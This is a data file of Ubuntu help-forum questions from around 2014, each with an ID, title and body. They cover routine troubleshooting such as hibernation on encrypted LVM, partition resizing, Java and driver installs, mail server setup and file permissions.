491984	how to hibernate in a full-encrypted disk using lvm ?	i 'm running ubuntu 14.04 and set up my system using lvm with full disk encryption . then i installed uswsusp and the loading failed . i searched the web and found that this is because my swap partition is encrypted . but all solutions i found on the web deal with the case where only the swap partition is encrypted ( not using lvm to encrypt the whole disk ) . is there any way to enable hibernate on a fully-encrypted disk ?
491986	desktop icons - creation	how can i create icons on the desktop . using ubuntu 14.04 ( unity ) . i think terminal will help , the problem is that i am new to ubuntu . linking can not work i tried it . thanks in advance
491990	doing a fresh ubuntu install without having to reinstall packages	i 'm currently on debian wheezy and i want to install ubuntu . i 'm on a slow broadband connection and i do not want to download all the packages again that i installed on the debian installation . is there any way around so that the new ubuntu installation installs/clones the previous package files of the debian installation ?
491992	alternating windows shortcut	i find the short cut to alternate windows ( ie the last application used ) to be very helpful . previously , on mac os on my macbook i used to press `` command ( super ) +tab '' . on ubuntu , this allows me to choose an application from the sidebar , but in the order they appear . i want to just choose the last application used ( or the second to last application i used if i use the shortcut twice ) . any suggestions ?
491993	apport error reporting privacy issues	as apport is enabled by default since 12.04 i thought it would be important to get some much needed clarifications on certain privacy questions that have been bugging me . how paranoid is apport about potentially sending sensitive information to a remote server ? if i 'm not mistaken it used to be pretty paranoid because it insisted on asking the user 's confirmation for sending things like logs which might contain the usually harmless host name , but i went over the files in /var/crash/ and found loads and loads of data containing not only the host name but even core dumps ( the `` coredump '' name which precedes a blob of data in one of those files ) which could potentially reveal - if i 'm not mistaken - any password that has ever been used on a computer ( depending on circumstances , of course ) . can i assume that all logs found in /var/crash/ have been sent to canonical `` as is '' - that is , as found in that directory , including the core dumps ? oftentimes i experienced some crashes which resulted in a window asking me whether i want to send a report to canonical , a window that had a button titled `` report problem ... '' but with no checkbox for allowing the user to inspect the information being sent . when pressing the button i expected to be presented with a follow-up dialog showing what is being sent ( because of the `` ... '' present in the caption of the button ) . however , no such follow up dialog appeared which leads me to my final question : what happened when i pressed that button ? what is actually being sent to canonical , if anything ?
491995	icedtea plugin for openjdk 8	i updated from openjdk 7 to openjdk 8 . meanwhile i uninstalled jdk 7 ( which uninstalled icedtea plugin too ) . i tried to reinstall icedtea with sudo apt-get install icedtea-7-plugin but it does n't work . when i tried to launch topcoder jnlp file , it fails . also , it does n't load any java plugin in chrome . it was fine with jdk 7 . is there any newer version of icedtea for jdk 8 . i could n't find one . please help me . thanks in advance .
491998	ubuntu 14.04 missing tmp	i installed ubuntu 14.04 using wubi and i ca n't get past the boot stage..keeps giving me /tmp missing error . i do n't know how to edit grub from the boot page .
491999	how can i install anaconda on ubuntu ?	i need help to install the anaconda python distribution on ubuntu 14.04 . i ran in terminal the bash script anaconda.sh , but i thing i have to do something else after that .
492000	gui is not coming after installing ubuntu 14.04	i have the same problem . i can not see gui only a black screen with one curser in top left corner blinking . one time only i could open the terminal but no gui at all . note : when booting from pendrive having same ubuntu 14.04 i could see the gui but when installed on my desktop i could not see gui . how to fix ?
492001	computer wo n't suspend : acpi set timing mode failed	some time ago i installed ubuntu 14.04 so i am kinda new to using linux in general . after the install i started facing an extremely annoying error . every time i try to suspend/hibernate my laptop i get an error and it does n't want to go to sleep . another thing to know is that it doesnt always happen . sometimes it manages to suspend , sometimes not . [ 24423.538466 ] ata1 : acpi set timing mode failed ( status=0x300b ) [ 37304.624253 ] freezing of tasks failed after 20.002 seconds ( 0 tasks refusing to freeze , wq_busy=1 ) ; thanks in advance . nikolay
492002	when using a dovecot and postfix can not connect using a domain only ip address ?	i have setup a postfix , dovecot , and roundcube sever on ubuntu 12.04.4 x64 and it works great . i can use my url mail.myurl.com and it points to my roundcube and i can send and receive email . if i use outlook or another other mail program i can connect to imap if i use my server static ip address but not my url . i do n't want to have to memorize an ip address when setting up emails on outlook and our phones . any ideas where this may be ? my hosts file has my url in it with my static ip address . thank you for all of your help
492004	microsoft lifecam hd-3000 slows down login	as long as my microsoft lifecam hd-3000 is plugged in my machine freezes for about 30 seconds as soon as the login manager comes and another time right after i put in my password . this is seriously annoying . any ideas what could be causing this ?
492005	booting into current kernel disables networking , virtual keyboard	i have a poweredge 300 running ubuntu 14.04 lts . a couple of dist-upgrades ago , my ssh connection died partway through and i can no longer boot cleanly . if i boot in to the current kernel ( 3.13 ) , i see this error : booting system without full network configuration and then : waiting up to 60 seconds more for network configuration after the purple loading screen goes away , the virtual console ( dell drac5 ) shows the login prompt but no longer accepts keyboard input . in order to boot , i have to enter grub ( 2 ) , go in to advanced options and manually select `` ubuntu , with linux 3.2.0-32-generic '' . the four options in grub are : ubuntu , with linux 3.13.0-30-generic ubuntu , with linux 3.13.0-30-generic ( recovery mode ) ubuntu , with linux 3.2.0-32-generic ubuntu , with linux 3.2.0-32-generic ( recovery mode ) booting into 3.13 with recovery mode does n't work either -- the virtual keyboard stops working after the recovery menu . here 's what 's in /boot : $ ls -l /boot total 43508 -rw-r -- r -- 1 root root 1162257 jun 9 19:45 abi-3.13.0-30-generic -rw-r -- r -- 1 root root 792532 sep 26 2012 abi-3.2.0-32-generic -rw-r -- r -- 1 root root 165576 jun 9 19:45 config-3.13.0-30-generic -rw-r -- r -- 1 root root 140488 sep 26 2012 config-3.2.0-32-generic drwxr-xr-x 5 root root 8192 jul 4 15:45 grub -rw-r -- r -- 1 root root 8082283 jul 4 15:45 initrd.img-3.13.0-30-generic -rw-r -- r -- 1 root root 16988925 nov 4 2012 initrd.img-3.2.0-32-generic -rw -- -- -- - 1 root root 3378641 jun 9 19:45 system.map-3.13.0-30-generic -rw -- -- -- - 1 root root 2884076 sep 26 2012 system.map-3.2.0-32-generic -rw -- -- -- - 1 root root 5793152 jun 9 19:45 vmlinuz-3.13.0-30-generic -rw -- -- -- - 1 root root 4966768 sep 26 2012 vmlinuz-3.2.0-32-generic and the output of fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 * 63 192779 96358+ fd linux raid autodetect /dev/sda2 192780 8000369 3903795 fd linux raid autodetect /dev/sda3 8000370 976773167 484386399 fd linux raid autodetect disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 63 192779 96358+ fd linux raid autodetect /dev/sdb2 192780 8000369 3903795 fd linux raid autodetect /dev/sdb3 8000370 976773167 484386399 fd linux raid autodetect disk /dev/md2 : 496.0 gb , 496011575296 bytes 2 heads , 4 sectors/track , 121096576 cylinders , total 968772608 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md2 does n't contain a valid partition table disk /dev/md0 : 98 mb , 98566144 bytes 2 heads , 4 sectors/track , 24064 cylinders , total 192512 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table disk /dev/md1 : 3997 mb , 3997368320 bytes 2 heads , 4 sectors/track , 975920 cylinders , total 7807360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/md1 does n't contain a valid partition table here 's update-grub : generating grub configuration file ... warning : setting grub_timeout to a non-zero value when grub_hidden_timeout is set is no longer supported . found linux image : /boot/vmlinuz-3.13.0-30-generic found initrd image : /boot/initrd.img-3.13.0-30-generic found linux image : /boot/vmlinuz-3.2.0-32-generic found initrd image : /boot/initrd.img-3.2.0-32-generic done both grub-install /dev/sdb and grub-install /dev/sda work cleanly with no errors .
492008	how to convert *.raw to *.vhd with qemu-img command	i created a memory dump out of the userdata partition of my android device for recovery purposes . i need to be able to convert this dump.raw to a dump.vhd so i can be able to mount it up in windows environment and do the recovery stuff ... it 's a 26gb file and when i tried the following command it just finished the process without any output , however creating a file less that 1gb . qemu-img convert -f raw -o vpc dump.raw dump.vhd what am i doing wrong ? i 'm using kali btw , but that should n't be a problem , should it ? result of qemu-img info dump.raw : image : dump.raw file format : raw virtual size : 26g ( 27919580672 bytes ) disk size : 26g however the linux itself shows it as 27.9 gb ( 27,919,580,253 bytes ) ! ! !
492010	can not expand ubuntu partition even though i have 22 gb of extra unallocated space	i have shrunk my windows partition so that i can expand my ubuntu partition . i have the following partitions : i have booted from usb and unmounted the swap partition as well . the unallocated space is adjacent to the linux partition /dev/sda5 . however , when i try to expand it by right-clicking and choosing resize/move , i see the maximum partition size as only about 1.5 gb larger : how can i expand the ubuntu partition to include the 22 gb unallocated space ?
492013	recovery mode grub partition	i deleted a disk partition using g-parted and i rebooted the system and it went into grub recovery . it showed a message that no partition found . i am pretty sure it was not grub partition . i also do not know grub commands . please help . i somehow reinstalled ubuntu .
492016	kali linux to be installed as a boot option	i only have the current ubuntu 14 on my harddrive . how do i partition my hard drive so i can have a second os such as kali linux , thus creating a dual boot-up option when i power up ?
492017	why does ubuntu become unresponsive during high io ( read/write ) operations ?	two example cases : example 1 : mount an external unencrypted drive ( gpt , ext4 ) and copy a 8gb file from my computer 's ssd ( gpt , ext4 ) - > the whole gui will become unresponsive . no input devices work . example 2 : start a 40gb vm with virtualbox - > the whole gui will become unresponsive . no input devices work . using iotop i can see that these disk read/write operation took up 100 % cpu . how can i avoid an unresponsive computer while moving large data ?
492018	how can i make the power button menu appear immediately ?	since the ubuntu unity 14.04 release , when pressing the power button - the menu for shutting the computer down/logging out/ ... will only show if you keep pressing the button for about a second at least . i 'd like to not have this because pressing the power button just normally does not do anything anymore . how can i make the power button menu appear instantly ?
492027	problem installing packages - java	i 'm having a problem installing java . it keeps telling me this when it starts to remove outdated cached downloads : removing outdated cached downloads ... sha256sum mismatch jdk-8u5-linux-x64.tar.gz oracle jdk 8 is not installed . dpkg : error processing package oracle-java8-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up oracle-jdk7-installer ( 7u60-0~webupd8~0 ) ... errors were encountered while processing : oracle-java8-installer w : duplicate sources.list entry http : //www.duinsoft.nl/pkg/ debs/all amd64 packages ( /var/lib/apt/lists/www.duinsoft.nl_pkg_dists_debs_all_binary-amd64_packages ) w : duplicate sources.list entry http : //ppa.launchpad.net/webupd8team/java/ubuntu/ trusty/main amd64 packages ( /var/lib/apt/lists/ppa.launchpad.net_webupd8team_java_ubuntu_dists_trusty_main_binary-amd64_packages ) w : you may want to run apt-get update to correct these problems e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can someone help me ?
492029	update-alternatives -- install	i typed : sudo update-alternatives -- install `` /usr/bin/java '' `` java '' `` /usr/lib/jvm/ jdk1.8.0/bin/java '' 1 it 's says alternatives -- install needs link name path priority
492031	size of partitions	so i 've decided to install ubuntu 14.04 , which i will use alongside mac os x and windows . my plan was to install ubuntu on a usb 3.0 external hdd . so far the installation is going fine , but now i need to set partitions for different sections of ubuntu , which are swap , / , /home and /boot . i have reserved 70 gb of free space on the external hdd to install ubuntu . it 's just to experiment with , i will not be installing loads of files on it . now i am wondering what sizes each partition will have to be . using windows and mac os x , you just press format and you can chuck the os in the partition . this is a bit more advanced and i want to make sure i do n't mess up . i am told for swap it is recommended to do 1.5 to 2 times the size of your ram . i have 8 gb of ram in my laptop , so how should i distribute the 70 gb over these four partitions ? thanks folks .
492033	fontconfig error : can not load default config file	having issues when i start most graphical programs . simply just says fontconfig error : can not load default config file i can confirm that /etc/fonts/fonts.conf exists and has the correct permissions . -rw-r -- r -- 1 root root 5497 jan 16 09:55 fonts.conf i 'm not getting any other information associated with this error , and searching has n't provided any helpful information either . what can i do to fix this ? running gedit , geany , chromium-browser , firefox , libreoffice ... basically any graphical program that uses fonts edit using strace i 've found the problem stems from here : access ( `` /data/jenkins/pms-deps-universal/build_tag/linux-ubuntu-i686/output/pms-depends-linux-ubuntu-i686-release-8400c3b/etc/fonts/fonts.conf '' , r_ok ) = -1 enoent ( no such file or directory ) write ( 2 , `` fontconfig error : `` , 18fontconfig error : ) = 18 write ( 2 , `` can not load default config file '' , 31cannot load default config file ) = 31 i 've never used jenkins before , i 'll try removing it and see what happens sudo apt-get purge jenkinsreturns that jenkins is not installed ... i do n't even have a /data/ partition . how can i change the path for fontconfig ?
492039	want to change unallocated to fresh space	i already have windows 8 and i want to install ubuntu 14.04 on my system ( first time ) . as because of unallocated partition , it showed unusable , while installation of ubuntu 14.04 . kindly see the matter . it is urgent . thanks
492044	how to load ubuntu onto apsire 5810 laptop	i have download the ubuntu os onto a dvd and tried to load it onot my aspire 5810t laptop but it will not boot it from the dvd drive . i have changed the order on the boot menu and put cd/dvd rom drive at the top . when i restarted the laptop it tries to load the dvd but then starts with windows vista what am i doing wrong to get ubuntu onto my laptop ?
492045	local mirror questions	i would like to set up a local mirror for 12.04 lts and 14.04 lts on our local public library 's server . our town has no real broadband internet ( most people are on either dial-up or satilite , with limited downloads ) . the local library has a 10mbit ( fiber ) connection and some 'spare ' disk space . i have install debmirror and created a pair of scripts like this ( the other script is the same , but for 14.04 [ trusty ] ) : # ! /bin/bash here=`pwd` cd `dirname $ 0` there=`pwd` cd $ here arch=amd64 , i386 section=main , restricted , universe , multiverse release=precise server=us.archive.ubuntu.com inpath=/ubuntu proto=http echo $ here echo $ there outpath=`dirname $ there`/precise echo $ outpath debmirror -a $ arch \ -- no-source \ -s $ section \ -h $ server \ -d $ release \ -r $ inpath \ -- ignore-release-gpg \ -- progress \ -- no-check-gpg \ -e $ proto \ $ outpath section=main , restricted , universe , multiverse release=precise-updates server=us.archive.ubuntu.com inpath=/ubuntu proto=http echo $ here echo $ there outpath=`dirname $ there`/precise-updates echo $ outpath debmirror -a $ arch \ -- no-source \ -s $ section \ -h $ server \ -d $ release \ -r $ inpath \ -- ignore-release-gpg \ -- progress \ -- no-check-gpg \ -e $ proto \ $ outpath section=main , restricted , universe , multiverse release=precise-security server=security.ubuntu.com inpath=/ubuntu proto=http echo $ here echo $ there outpath=`dirname $ there`/precise-security echo $ outpath debmirror -a $ arch \ -- no-source \ -s $ section \ -h $ server \ -d $ release \ -r $ inpath \ -- ignore-release-gpg \ -- progress \ -- no-check-gpg \ -e $ proto \ $ outpath section=main , restricted , universe , multiverse release=precise-backports server=us.archive.ubuntu.com inpath=/ubuntu proto=http echo $ here echo $ there outpath=`dirname $ there`/precise-backports echo $ outpath debmirror -a $ arch \ -- no-source \ -s $ section \ -h $ server \ -d $ release \ -r $ inpath \ -- ignore-release-gpg \ -- progress \ -- no-check-gpg \ -e $ proto \ $ outpath my question is : is the the right way to do it effiencently ? should i 'merge ' this into a single call to debmirror ( i.e . append all of the 'release ' options into a single comma separated list ) ? what i am doing reflects how i have done this sort of thing for centos , but ubuntu seems different , in that there are not actually separate trees of package files for different releases and different parts of the release ( eg base os , updates , contrib , extra , etc . ) -- it is all 'munged ' together , with the repository metadata being used to sort things out . any useful advice ?
492046	apt-get loop for ppa 's	i recently wanted to install e17 on ubuntu 12.04 . i first tried to use the ppa ~ hannes-janetzek / enlightenment-svn and it did not work for me , because it did not all packages ( econnman ) , i kept searching and found efl /trunk if it contains all packages . by switching the ppa , i uninstall e17 and tried , after , reinstalling , but while install the new package they conflicted with some packages that were not deleted , particularly libefl libefl-bin , but now does not allow me to delete them until repair the last package . in other words , i ca n't repare the new package , because i need to delete the old packages , and i ca n't remove the old packages , because i need repair the new package i need to delete `` libefl '' and `` libefl-bin '' without apply apt-get -f install , and after this , use apt-get -f install help me please
492047	wireless - problem	i have asus laptop ( less than year old ) . i upgraded from ubuntu 12 to ubuntu 13 just while ago . everything seems to work except the wireless network ; it does not respond to network settings and on the bar on top of the screen there it is not possible to turn on wireless .
492048	errno5 ubuntu studio	hi guys whenever i try to install ubuntu i get an error which read errno5 input output everytime the usb drive is burnt right because live is working perfectly help me fast guys because i am in deep very deep
492052	installing ubuntu on samsung	can i install ubuntu on a samsung gt-m3710 , it does n't have android , it has shp . thank you very much .
492054	how to extend my root ( / ) partition ?	till today i was using ubuntu 13.04 in my windows7/ubuntu dual boot . just now i have upgraded to ubuntu 14.04 . my software updater showed an updates available message . i proceeded with install now . soon i got the following window . then i tried sudo apt-get clean as recommended . nothing happened ! not even a window opened . teach me deleting the temporary packages . deleting temporary files may not be highly helpful in case of further updates and installs for i do n't have too much space left in my / . i wan na extend my / partition with the help of the unallocated space in my hd . the following is my gparted window . i got an answer here . but it was n't useful for me . i had two choices . but the answer was n't working for both my chioces . choice 1 : i may use the 4.25 gib unallocated space to extend my /dev/sda10 . to do so , i must need to move my linux-swap partition . but my resize/move option is disabled for the linux-swap partition . choice 1 failed ! choice 2 : i may use the 14.35 gib unallocated space instead . in this case i must move more than one partition . /dev/sda4 partition is the first on the list . even that partition has the same problem . resize/move option is disabled . choice 2 failed ! i am out of choices now . what shall i do ? help me to extend my / with gparted .
492057	two partition tables are unrecognized	while trying to installing ubuntu 14.04 as my sole operating system , i 've been encountering a number of issues ( described in more depth at ubuntu 14.04 installation crashes with `` ? ? ? '' message after selecting drive ) , all of which seem to be related to gpt and raid , both of which i know little about . when i open gparted , i get this error message : upon xing out the error message and checking /dev/sda and /dev/sdb , i see that they are unrecognized ( the image below shows /dev/sda ) : my laptop is an asus zenbook ux51vz-xh71 , which comes with two ssds ( 2x128gb or 2x256gb ) in an intel rapid storage ( aka intel matrix ) raid 0 configuration and uses uefi and gpt . here is what the arch wiki says : the ux51vz comes in a variety of configurations , most of those sold in western europe come with two ssds ( 2x128gb or 2x256gb ) in an intel rapid storage ( aka intel matrix ) raid 0 configuration . to install arch linux on the ux51vz , you can follow the official installation guide . since the ux51vz uses uefi and gpt , make sure to also read the uefi , gpt and uefi_bootloaders pages . it is recommended to use refind as a bootloader and mount the efi partition on /boot . to prepare a uefi usb device , read uefi # create_uefi_bootable_usb_from_iso . the only way to preserve the pre-installed windows instance is to install arch with raid without breaking up the raid 0 array . see raid with the only difference that you should not create arrays , only assemble . note : as of bios version 207 on ux51vzh there is no option to reconfigure the intel rst setup through bios . once you break your array , you can not set it up again . for linux-only users , mdadm software raid should be a better option . i have deleted all partition tables using gparted .
492059	kubuntu 14.04 locks mouse and keyboard after lid is closed	when i close the lid and after open it , the unblock screen , mouse and keyboard is locked . the laptop needs to be restarted by power button . can someone help me ?
492061	satellite pci-e drivers	i have downloaded the drivers for my tbs 6981 card but being new to linux i dont know were to start . all i know is it is done via the terminal input any help would be appreciated .
492062	12.04 lts wifi not working	i had been messing around trying to make it so it does n't ask for audi perms every npm command and that messed up all audi commands eventuly i fixed it but now wifi audio and the battery indicater army in the task-bar . i did sudo network-manager restart and now it shows the wifi icon but no connections . also i did rfkill list all and it says no straight down . any ideas ?
492063	can i open two or more files in vim at once ?	i have a file with the name first.txt , which i opened that by vim . now i want to go another file which its name is second.txt . how to open second.txt while i do not close first.txt . how to switch between them first.txt and second.txt on the vim ?
492065	how do i remove single boot ubuntu and install windows 8 from usb on surface pro ?	so i bought a surface pro off ebay that has ubuntu 14.04 loaded with grub . i 'm wondering how i go about uninstalling ubuntu and grub to allow me to boot my windows installer from usb ? thanks .
492068	linux vps : remote access over xrdp	this is the first time i 'm using a linux server , and i '' m trying to connect to the desktop over win 8.1 remote desktop access . to to this i 've search some google and found that it can be done using xrdp . i installed that and the login screen came up on the remote desktop screen , when i login all i see is this screen : i googled more , i found some links on installing gnome fallback , when i do so , the terminal asks for yes or no to install the package , when i press y , it says the package can not be found or if i wan na use fix-missing command . i do n't know much about linux , what could be the problem and how can i connect to the server over remote desktop .
492069	installing a ssl certificate	i have ispconfig3 installed on my server . i 've never installed an ssl certificate before , especially with ispconfig3 . i am trying to install the default domain certificate and i was given 4 files . i have a few questions : which files do i need to modify ? do i need to do anything specific to ispconfig3 ? i read that the files i need to modify are in this directory : /etc/apache2/sites-enabled i have four files in here : 000-apps.vhost 000-default.conf 000-ispconfig.conf 000-ispconfig.vhost what do i put in them ? i was given four files : addtrustexternalcaroot.crt comodorsaaddtrustca.crt comodorsadomainvalidationsecureserverca.crt experiencedhosting_com.crt i 'm not sure what i put where . do i have to do anything special for openssh ? any help would be greatly appreciated !
492072	asus x550ld , unable to connect to wired network	i have an asus laptop , with an atheros ar9565 wirelss network adapter . the wifi works fine , but i 'm unable to connect to a lan or wired network . it disconnects before i 'm fully able to connect . i tried doing this , sudo apt-get install build-essential linux-headers-generic linux-headers-`uname -r` wget -o- http : //linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2012-07-03-pc.tar.bz2 | tar -xj cd compat-wireless-2012-07-03-pc ./scripts/driver-select alx make but it fails with this error . /home/manoj/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros/alx/alx_main.c : in function ‘alx_hw_printk’ : /home/manoj/compat-wireless-2012-07-03-pc/drivers/net/ethernet/atheros /alx/alx_main.c:124:3 : error : implicit declaration of function ‘__netdev_printk’ [ -werror=implicit-function-declaration ] __netdev_printk ( level , hw- > adpt- > netdev , & vaf ) ; any suggestions would be helpful .
492076	how do i toggle the default hardware keyboard input off , and only use a usb keyboard for input most of the time ?	my laptop keyboard died and i installed a wireless usb keyboard which i like just fine . i installed the replacement for the laptop ( hardware ) keyboard , and it 's working too . i would like to be able to toggle the hardware keyboard off - mostly because my cats tend to jump and walk on it , but they leave my usb keyboard alone . however , i do not want to disable it completely ( i could just unplug its ribbon ) ; there are times when i would want to use it instead of the usb keyboard . for example , the usb keyboard does not have the mapping for the hp function keys , and i do n't want to spend a lot of time figuring out key codes for them . i tried googling , but found a lot of posts about toggling keyboard layouts , not keyboard input devices . a few years ago i set up a launcher that toggles the touchpad on/off . i do n't remember how i did that , but it works great , and i would like to add a launcher button , or keyboard combo , that toggles the built-in keyboard on/off . ubuntu 13.10 hp pavilion dv7 64 bit model : ww181av
492078	restrict user access to /proc and /sys	i have one big problem : setfacl does not seem to work for /proc and /sys , but i would like to restrict one specific users rights and i do not find it acceptable for that user to read stuff like /proc/cpuinfo etc . ( the user should not be able to gather hardware information about the system ) how would i do this in ubuntu ? apparmor is more for restricting applications , but not users . it seems selinux is the only possibility in this case , right ? i have worked around in my script this way : # restrict read access to /sys and /proc sudo chmod -r /sys sudo chmod -r /proc/acpi sudo chmod -r /proc/asound sudo chmod -r /proc/bus sudo chmod -r /proc/cgroups sudo chmod -r /proc/consoles sudo chmod -r /proc/cpuinfo sudo chmod -r /proc/crypto sudo chmod -r /proc/devices sudo chmod -r /proc/diskstats sudo chmod -r /proc/dma sudo chmod -r /proc/dri sudo chmod -r /proc/driver sudo chmod -r /proc/execdomains sudo chmod -r /proc/fb sudo chmod -r /proc/filesystem # ... now i wonder , if this could create serious problems if i simply remove the read access to those files ( i only remove read rights for files that have names , not for the number directories ) , apart from some system monitoring tools not working with user rights ( like top , lscpu ) ? apart from the issues that creates for other users , this solution is utterly inelegant . i do not want to compile and maintain a grsecurity kernel either , that creates too much trouble .
492079	can not instsl ubunt-server near to windows 8.1	i 've tried a lot . i was trying to install it using a flash card ( two different cards ) , then with cd 's ( two ) and dvd ( one ) , but my computer just load windows ( i 've tuned bios , like it had to be ) . i 've tried wubi , but there was an exeption `` could not retrieve the required installation files '' ( kubuntu ) , and `` undefined error with disk d '' ( with ubuntu ) . i think that the problem is in my os - it is 32-bit , when my processor is 64-bit , can it be so ? i just do n't know what to do , plese , help me .
492080	how to configure an openvpn connection in xbmcbuntu 14.04 - networkmanager is not available with standalone install	i have a question about configuring network settings in xbmcbuntu summary : - need to set up openvpn connection on xbmcbuntu 14.04 - ca n't run networkmanager from xbmcbuntu 14.04 standalone installation - ca n't configure vpns ( or much of anything ) from nmcli details : i have an xbmcbuntu 14.04 machine ( running xbmc 13.1 - not that it matters ) . i would like to configure an openvpn connection on the box , but i ca n't get to networkmanager . i see other answers to similar questions , but those are all for machines running previous versions of xbmc . from what i can surmise from other posts , i believe previous versions of xbmcbuntu allowed you to log on and run a window manager instead of launching directly into xbmc if you selected a session type on the log in dialog , but i do n't have that option from the log in dialog . it just has a user & password field , not dropdown to select the type of session to run . also , nmcli does n't have any way to add connections , just connect to those configured using the graphical applet . if i could get to a window manager , i could run networkmanager and set up the vpn connection , but since i ca n't , does anyone have a suggestion on how to configure it ? i 'm very comfortable with the command line , in case anyone knows how to do it that way . thanks very much for reading this whole long post and any for any advice !
492082	why is this password not good enough ?	i was changing my password on ubuntu 14.04 and wondering why is this password not good enough : pr # cur @ rempr_3go ! my current password is procurar @ empr3go ! any ideas ?
492085	403 forbidden error when installing software in kubuntu 14.04	when i try to install software in kubuntu 14.04 it shows these errors : http : //bd.archive.ubuntu.com/ubuntu/pool/universe/q/qca2-plugin-gnupg/libqca2-plugin-gnupg_2.0.0~beta3-2_amd64.deb 403 forbidden http : //bd.archive.ubuntu.com/ubuntu/pool/universe/k/kdeconnect/kdeconnect_0.5.2.1-0ubuntu0.1_amd64.deb 403 forbidden`
492086	unable to restart lubuntu after installation	i´ve installed lubuntu-ubuntu 14.04 lts on my older laptop ( acer travelmate , 512 mb ram ) and everything worked fine until i got to the removing of the boot dvd from the drive and to restart - nothing happens , i just see the lubuntu screen with the five dots . i was waiting for 10 or 15 minutes , than i forced the pc to turn off . if i switched it on again , everything was working fine until i tried to switched it off again . next time i tried to shut it down from the terminal , but that doesn´t work either . i´ve installed it with all preconditions ( available space , connection to the internet and plugged in ) . than i tried to update the lubuntu and the boot-repair . it showed me different numbers each time : 7751150 after first installation , 7752193 after updates and 7752156 at the end . i am thinking about to try another linux distribution , maybe mint , if i can not solve this shutting down problem . would that help ? or should i use another lubuntu ? not the 14.04 ? my current distribution is coming from one dvd delivered by an pc journal- intended to replace xp system .
492096	how to permanently change ownership of a file ?	when i change ownership of /sys/class/backlight/intel_backlight/brightness with chown its ownership changes again to root after system startup .
492099	how to zebra stripe the console ?	i 'd like the terminal to alternate the background color on successive lines , making it easier to see where one starts and the next one ends . this would be specially useful when reading logs with tail -f , but , i 'd prefer a solution that works all the time . specially if it 's something i can use with terminator , though i 'd be willing to use a different terminal if it has this functionality .
492100	php is not working with apache on lamp server	i have lamp server on ubuntu , the apache2 is successfully installed and local host is working . but i have no way to create/copy to the www folder , also my phpmyadmin is not working .
492103	encfs to decrypt cryptkeeper folder	i had a folder encrypted with cryptkeeper that i copied from another system . i thought i lost all those files , but after examining the folder i found a .mypics_encfs folder . inside the folder there is encrypted files plus an xml file .encfs6.xml , is there a way i can decrypt this folder ? i tried with encfs but did n't get lucky to solve this .
492107	how to set up a mail server with multiple domains ( 12.04 )	i 'm the only user on my server , so the default install of postfix/dovecot has been fine until now . but i now have 4 domains and need an email address for each of them . i would like to be able to send/receive with them via pop3 with an email client . i was following this decent guide until i got to the end and saw the note that it does n't work in 12.04 . i tried this `` basic setup '' guide which starts with the gem `` i assume that you know what an mx record is . '' ( well no , that 's why i need a guide . ) there are surprisingly few guides on how to do this . i understand the security risks ; it 's only me on the system . a non-flexible solution ( where the email addresses are set in stone at the beginning ) would even be ok with me , if it was simpler .
492108	how to disable 'scanning btrfs filesystem ' at system startup	after upgrading from ubuntu 12.04 to ubuntu 14.04 , i get a message `` scanning for btrfs file systems '' at starting-up . i do n't have any btrfs filesystem . it delays the booting for about 15 seconds . i tried to : blacklist the brtfs module in /etc/modprobe.d remove btrfs-tools renamed the executable /sbin/btrfs to p.e /sbin/btrfs.save now i get a blank screen for about 15 seconds until the splash screen appears .
492112	installed tor , looking to install/run tor browser	ok , i did n't get the tor from ubuntu . i installed the client , that 's all set . says successfully opened a circuit . now , i would like to know how to set up a browser with it . i am using the latest ubuntu build , codenamed trusty . any help for this nuub would be greatly appreciated . thank you .
492113	use of /etc/hosts file v/s apache 's default file	i have a domain name that i am testing locally ( say www.xyz.com ) . in my apache 's default file , i have the block : < virtualhost *:80 *:8080 > servername www.xyz.com documentroot /var/www/xyz directoryindex index.php < /virtualhost > earlier i also had the following entry in my /etc/hosts file : 127.0.0.1 www.xyz.com when i tried to remove this entry , i can still browse the domain name from firefox browser . i want to know whether this entry is even used ? i know /etc/hosts is used keep dns resolution , like an ip addr for a domain name . so when i type www.xyz.com in my browser , does it not first try to find its ip from this file , or does it somehow just rely on the apache web server 's default file . can someone please clarify .
492116	webcam not identified by the system	my hp pavilion laptop dv6701us inbuilt webcam does not work , it 's not being identified by the system . what should i do to make it work ? driver ?
492117	i do n't have permission to access this device on iftop and need to be root to run nethogs	i have two dilemma 's here : one is , i tried using iftop but it said i do n't have permission to capture on that device ( socket : operation not permitted ) i can use ifconfig just fine . also , i installed nethogs and tried to use it . but it came up with , you need to be root to run nethogs . i 'm extremely new to ubuntu , anyone help ?
492118	custom ubuntu file manager shortcuts	is it possible to make the file manager of ubuntu use the same shortcuts as chrome ? i mean : ctrl + tab open the next tab , ctrl + t opens a new tab , ctrl + w close the current tab is that possible ?
